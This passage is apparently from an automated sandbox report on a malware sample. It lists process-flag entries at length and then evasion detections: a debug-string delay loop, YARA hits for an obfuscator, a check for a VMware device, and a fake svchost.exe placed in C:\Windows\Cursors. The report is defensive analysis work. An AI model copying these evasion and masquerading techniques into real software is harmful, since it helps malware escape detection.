                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion:

                      barindex
                      Tries to delay execution (extensive OutputDebugStringW loop)Show sources
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeSection loaded: OutputDebugStringW count: 230
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeSection loaded: OutputDebugStringW count: 115
                      Yara detected Beds ObfuscatorShow sources
                      Source: Yara matchFile source: 00000015.00000002.485923538.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000002.541864387.0000000004A72000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.517681508.0000000004965000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 23.2.svchost.exe.4a72390.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.2.svchost.exe.4ad53b0.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.2.svchost.exe.4ad53b0.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.svchost.exe.49c8f18.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.svchost.exe.4965ef8.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 21.2.lfQuSBwdSf.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.svchost.exe.4965ef8.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.2.svchost.exe.4a72390.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.svchost.exe.49c8f18.2.raw.unpack, type: UNPACKEDPE
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3193
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2412
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2279
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2611
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1755
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1706
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exe TID: 3156Thread sleep count: 100 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3032Thread sleep time: -20291418481080494s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3032Thread sleep time: -30000s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 492Thread sleep count: 2279 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2576Thread sleep count: 57 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5364Thread sleep time: -1844674407370954s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5364Thread sleep time: -30000s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2224Thread sleep count: 2611 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 464Thread sleep count: 1755 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6332Thread sleep count: 50 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5684Thread sleep time: -1844674407370954s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5684Thread sleep time: -30000s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5572Thread sleep count: 1706 > 30
                      Source: C:\Windows\System32\svchost.exe TID: 6288Thread sleep time: -30000s >= -30000s
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe TID: 6532Thread sleep count: 100 > 30
